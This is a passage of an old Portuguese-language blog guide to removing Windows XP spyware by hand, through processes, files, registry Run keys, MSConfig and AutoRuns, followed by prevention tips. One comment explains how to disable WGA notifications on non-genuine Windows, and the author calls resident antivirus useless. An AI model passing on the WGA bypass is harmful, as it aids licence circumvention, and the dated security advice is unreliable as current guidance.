Bem, fechado o programa, você pode excluir o arquivo correspondente a ele. Tome cuidado aqui, para não excluir um arquivo errado, do sistema ou de outro programa bom que você use. Antes de excluir é bom pesquisar na Internet pelo nome do executável, ou então movê-lo para uma outra pasta, ou mesmo renomeá-lo com outra extensão (por exemplo, “coisax.exe” viraria “coisax.123”).

Para excluir, você deverá saber onde se encontra o arquivo. A maioria dos spywares são instalados na pasta “system32” (creio que escolhem essa por ser uma pasta de sistema, que ainda por cima contém muitos arquivos), assim fica difícil encontrar “suspeitos” apenas olhando lá dentro. Uma dica é usar a pesquisa do sistema operacional, aquele “Pesquisar” do Iniciar, jogando o nome do arquivo desejado. Nessa tarefa, algumas configurações do Windows acabam atrapalhando. Para ficar mais seguro para você, altere estas opções:

* Na guia “Modos de exibição” das opções de pasta (menu “Ferramentas > Opções de pasta”, do Windows Explorer), marque o item “Mostrar todos os arquivos” na categoria “Arquivos ocultos”. E desmarque o “Ocultar arquivos protegidos do sistema operacional”. Ainda ali, desmarque a opção que oculta as extensões dos arquivos. Depois disso, basta tomar cuidado ao renomear seus arquivos, onde você deverá digitar o nome junto com a extensão, e não apague alguns arquivos que “aparecerão” na unidade C:, como boot.ini, ntldr, etc. Esses arquivos são do sistema e ficam ocultos por padrão. Pedi para exibi-los pois assim ele não ocultará os outros arquivos, facilitando a localização dos malwares, inclusive usando o “Pesquisar”.

* O “Pesquisar” do Windows XP veio para facilitar para usuários iniciantes. Para pesquisar arquivos ocultos em pastas do sistema, usando regras de pesquisa (máscaras) e opções avançadas, é terrível, ficou muito ruim. O ideal é voltar para a pesquisa clássica, igual à do Windows 2000/Me.

Pronto. Agora ficou mais fácil localizar o arquivo no disco e excluí-lo. Quase sempre os spywares estarão dentro da pasta system32, ou pelo menos na pasta do Windows. Mande pesquisar na pasta “C:windows” incluindo subpastas; caso não o encontre ali, mande buscar então em todos os discos rígidos locais. Pesquisando apenas na pasta do Windows a pesquisa será mais rápida, já que o buscador não terá que vasculhar todo o seu HD

Fechado o programa, excluído o arquivo, agora falta remover o ponto de entrada de inicialização, que faz com que o programa seja carregado durante o boot do sistema. Os programas que se iniciam junto com o computador podem ficar configurados em alguns lugares diferentes no Windows. Uma forma básica de ver isso é usar o MSConfig, programinha que já vem com o Windows (exceto NT e 2000) e que lista os programas abertos. Clique no “Iniciar > Executar”, digite msconfig e tecle enter. Na aba “Inicializar”, localize os itens desejados e desmarque o suposto malware. Depois de desmarcado, clique em Aplicar > OK. Ele pedirá para reiniciar o computador, fica a seu critério reiniciar no momento ou depois.

Dica: desativando outros itens desnecessários pelo MSConfig também, fará com que o computador inicie um pouco mais rápido e use menos memória; mas cuidado para não desativar programas importantes, como o firewall, antivírus (se você usar), etc.

Importante: sempre remova a entrada de inicialização do programa com ele fechado. Se você não fizer isso, alguns programas ficam regravando as chaves no registro enquanto estão abertos, justamente para que se você remova, logo eles regravam e serão inicializados depois, na maior cara de pau. Com eles fechados, simplesmente não têm como regravar.

Nem sempre será fácil remover programas indesejados dessa forma, mas boa parte deles podem ser removidos assim, por incrível que possa parecer

Outra dica é iniciar o computador limpo, sem spywares, e anotar os nomes dos programas que se iniciam automaticamente (seja pelo Process Explorer NT ou pelo próprio gerenciador de tarefas). Boa sorte

Outras formas de detectar programas que se iniciam automaticamente

Há diversas formas. As mais comuns são pelas chaves do registro:

* HKEY_LOCAL_MACHINE > Software > Microsoft > Windows > CurrentVersion > Run
* HKEY_LOCAL_MACHINE > Software > Microsoft > Windows > CurrentVersion > RunOnce
* HKEY_CURRENT_USER > Software > Microsoft > Windows > CurrentVersion > Run
* HKEY_CURRENT_USER > Software > Microsoft > Windows > CurrentVersion > RunOnce

Mas há também a pasta “Inicializar” no menu “Iniciar > Programas”. Alguns programas criam entradas ali, para esta é mais fácil: basta excluir o atalho. Clique em “Iniciar > Programas > Inicializar”; depois, clique com o botão direito no item desejado (se houver) e mande excluir.

Para as chaves do registro... Se você não mexe muito com o registro, cuidado: não saia fuçando em tudo. Exclua apenas entradas que você tenha certeza que podem ser excluídas, pois editar incorretamente o registro pode fazer com que o Windows nem seja iniciado – claro que isso poderá ser corrigido, mas poderá não ser tão fácil.

Nota: o “registro”, caso você não saiba, é um banco de dados de configurações usado pelo Windows e por diversos programas. O “editor do registro”, programa “regedit”, é uma interface que vem com o Windows que permite modificar as configurações gravadas no registro. O termo “registro” aqui não tem nada a ver com cadastro ou pagamento

Abra o editor do registro (“Iniciar > Executar” > digite regedit e dê OK). Ele tem o visual parecido com o do Windows Explorer, tratando as chaves do registro como se fossem “pastinhas”. À esquerda, localize as chaves e subchaves conforme indicam as setas nos caminhos indicados mais acima, até chegar na “Run” ou “RunOnce”. À direita são listadas as entradas referentes à chave selecionada à esquerda, que no caso, correspondem aos programas que se iniciam automaticamente com o computador. Selecione o do malware e delete, usando a tecla Del mesmo do teclado. Como falei, cuidado ao fazer isso; se não se sentir seguro, prefira usar o MSConfig ou esse outro programa que indicarei agora.

Também da SysInternals (agora Microsoft) um bom software é o AutoRuns. Ele lista praticamente tudo o que se inicializa com o Windows, incluindo muitos itens não exibidos pelo MSConfig. Veja:





Baixe-o em:

http://www.microsoft.com/technet/sysinternals/Utilities/AutoRuns.mspx


Ele é composto por várias abas de categorias. Com ele você pode desmarcar os itens e remarcá-los depois, caso se arrependa. Mas ainda assim, tome o cuidado de não desmarcar itens à toa, pois vários, “muitos” na verdade, correspondem a componentes essenciais do Windows. Por meio dele pode-se desativar extensões do Explorer, do logon, do IE, drivers de dispositivos e outros componentes. Ele é muito importante, deveria vir de fábrica com o Windows.

Comentário: é possível desativar também aquele WGA, que exibia notificações em Windows não originais; bastando desmarcar o ponto que carregava o WGA, no processo de logon do Windows, e a seguir deletando os arquivos do WGA do HD.

Tanto o Process Explorer como o AutoRuns são gratuitos e não precisam ser instalados, eles rodam diretamente, sendo muito úteis para fazer parte da mala de ferramentas dos técnicos Windows.

Windows bloqueado?

Alguns spywares e malwares em geral desativam componentes do Windows, usando recursos do próprio sistema.

Isso é possível porque o Windows foi projetado para suportar diretivas de empresas e grupos, onde os funcionários podem usar os computadores, mas não alterar configurações. Alguns spywares dão uma de “administradores” no seu sistema, bloqueando diversas coisas. Entre as mais visadas estão o bloqueio da página inicial do Internet Explorer, a edição do registro pelo regedit, de forma que você não consegue abri-lo nem usar os arquivos “.reg”, e em alguns casos, bloqueiam até o gerenciador de tarefas, para evitar que sejam fechados (aqui usar o Process Explorer NT normalmente resolve).

Esses bloqueios são feitos pelo registro, e caso você não possa abrir o regedit, e/ou se quiser remover diversos bloqueios de uma vez, recomendo um software meu mesmo: o AntiPolicy. Basta abri-lo, clicar na aba “AntiPolicy” e então no botão “Remover bloqueios...”.

Quase todos esses bloqueios serão liberados de imediato, alguns só no recarregamento do Explorer (no próximo logon, por exemplo). Vale a dica: primeiro, feche os malwares e certifique-se de que não estejam marcados para inicializar depois, pois eles poderão restaurar os bloqueios se forem abertos.


Download do AntiPolicy:
http://www.mephost.com/software/antipolicy.htm

Esse programa ainda permite fechar bruscamente processos também, servindo como um gerenciador de processos alternativo. Enquanto que o gerenciador de tarefas do Windows e o Process Explorer NT listam os processos pelo nome do executável, o AntiPolicy lista pelos nomes das classes de janelas. A maioria dos spywares não têm janelas visíveis, mas têm janelas ou pelo menos controles que não ficam visíveis mas são listados. No AntiPolicy, você pode fechar qualquer programa, pela aba “Visíveis” (os que estão rodando na barra de tarefas ou em uma janela) ou “Ocultos” (os que rodam sem ser exibidos, que vem a ser o caso da maioria dos malwares). Vale o cuidado de testar e ficar atento, pois você poderá fechar programas bons sem saber o nome da classe.

Diversos spywares usam nomes com XXX alguma coisa (referentes à pornografia), hk (da palavra “hacker”), ou somente números. Mas não há regras, você terá que caçar um pouco, e qualquer coisa, o Google está à disposição para nos ajudar (bem indiretamente, claro).

O Windows é seguro?

Até aqui vimos como tentar remover pragas que já foram instaladas. Mas... O melhor é prevenir, não remediar, não é? É melhor andar pela sombra do que ficar com dor de cabeça, é melhor usar blusa e guarda chuva do que pegar um resfriado. Vamos a algumas dicas então, que a maioria acha que todo mundo já está careca de saber (mas infelizmente, não é bem assim).

Use conta limitada (não de administrador) no dia-a-dia se puder, e mantenha o HD formatado em NTFS. Mais informações sobre o NTFS e a segurança aos arquivos podem ser vistas neste outro texto meu aqui no GdH:

http://www.guiadohardware.net/dicas/sistema-ntfs.html


Usar o Windows com conta limitada em partições NTFS é muito mais seguro, apesar de não ser agradável para o uso de alguns programas. Navegando assim, os malwares não poderão se instalar em pastas do sistema (como a system32, dentro da pasta do Windows) e não afetarão as outras contas de usuário, caso haja outros perfis no mesmo PC. É possível também rodar o IE (ou outro programa qualquer) como administrador, porém, sem direitos administrativos.

se um firewall. O do Windows XP SP2 é muito ruim (que me perdoe a Microsoft). De que adianta o sistema vir com um firewall se você deve desativá-lo e instalar outro, para mais proteção? Isso porque é um fato, o do XP SP2 protege contra invasões vindas da Internet, ou seja, protege contra acessos entrantes. Se um programa no seu PC tentar enviar um comando ou arquivo para a Internet, ele deixa (só bloqueia e alerta caso o programa tente ficar aberto em determinada porta, como um servidor, à espera de conexões entrantes).

Isso é ruim no caso de spywares: eles podem enviar dados (seus dados, suas senhas capturadas, por exemplo) sem que você tome conhecimento. O ideal é instalar um firewall de terceiros, que proteja o computador tanto de conexões de entrada como de saída, dando a possibilidade de você decidir se elas devem ser liberadas ou não. Um que tem versão gratuita e é muito usado é o ZoneAlarm. O Comodo também é bom e possui versão gratuita.

Como saber se o sistema está infectado? Se aparentemente seu computador funciona normal, e você quer saber se ele está infectado, pode valer a pena rodar um anti-spyware (como o SpyBot) ou até mesmo um antivírus, mandando fazer uma varredura completa. Aqui usamos os programas para aproveitar o tempo de processamento do computador, sua agilidade em comparar informações, em varrer vários arquivos e chaves do registro em busca de spywares conhecidos, etc. Usar um antivírus residente é o que eu não recomendo, pelo menos não uso, por ser definitivamente um item inútil (desde que você tome todos os devidos cuidados e outros). Não é para seguir uma receita, são um conjunto de atitudes que podem mudar isso. Se você se sentir mais seguro, fique com seu antivírus.


Além de usar programas de detecção, vale curiar no gerenciador de tarefas de tempos em tempos (dica: use o Process Explorer NT, que é bem melhor), no MSConfig, e ver se nada de estranho ou novo aparece por ali, sem que você tenha instalado.

Quer segurança? Cuide-se você. Eu não uso antivírus, continuo batendo o pé. Se você for firme nos seus atos, poderá não usar também. Basta manter o Windows atualizado, um firewall ativo (isso é essencial!) e o principal: não sair executando qualquer porcaria que chegue por email, não instalar controles Active-X no IE de sites suspeitos, não instalar qualquer barra de ferramentas no IE (elas atuam como programas, podendo fazer o que quiser!), não baixar anexos de emails suspeitos, sempre confirmar com quem lhe enviou antes de abrir um link de algum arquivo executável para baixar (principalmente se for de extensão .exe, .com, .bat, .cmd, .scr, .pif), etc.

Na sugestão de configuração mais acima, pedi para mostrar todas as extensões. Isso pode parecer ruim num primeiro momento para usuários básicos, mas permite que você identifique melhor o arquivo. Alguns mal intencionados colocam duas extensões nos arquivos, por exemplo, foto.jpg.exe. A última é a que vale: “foto.jpg.exe” é um programa, não uma imagem. Se as extensões não fossem mostradas, o Windows exibiria apenas “foto.jpg”, e os mais inocentes poderiam abrir, rodando o malware. Com elas sendo mostradas você sempre verá a extensão real. Se você der um duplo clique num malware ou vírus, estará autorizando a execução dele no computador, estará fazendo justamente o que o autor dele quis.

Não é que o Windows seja inseguro (mas claro que não é a melhor coisa em termos de segurança também, está muito longe disso , é a falta de informação e conhecimento dos usuários que o torna assim.

O Windows Vista não tem grandes mudanças estruturais com relação ao XP. Vendo-o e acompanhando a história do Windows, às vezes penso: “Puxa vida, estragaram o NT...”. O que mais se destaca no Vista em termos de segurança – e que ao mesmo tempo mais irrita os usuários, tanto é que boa parte opta por desativar – são as confirmações pedidas ao usuário para diversas tarefas e ações.

Você é o dono do seu computador, você decide o que quer rodar nele. Se você rodar porcaria, o Windows não tem culpa, ele irá executar a porcaria que você autorizou! O Vista pede muita confirmação, tudo bem, com isso você pode ver que se o usuário desse menos mole, teria seu Windows funcionando por muito mais tempo. Não estamos falando aqui de falhas do sistema (que quase todo software possui), mas sim de programas do mal em geral.
 
ST Informática | © 2010 by DheTemplate.com | Supported by Promotions And Coupons Shopping & WordPress Theme 2 Blog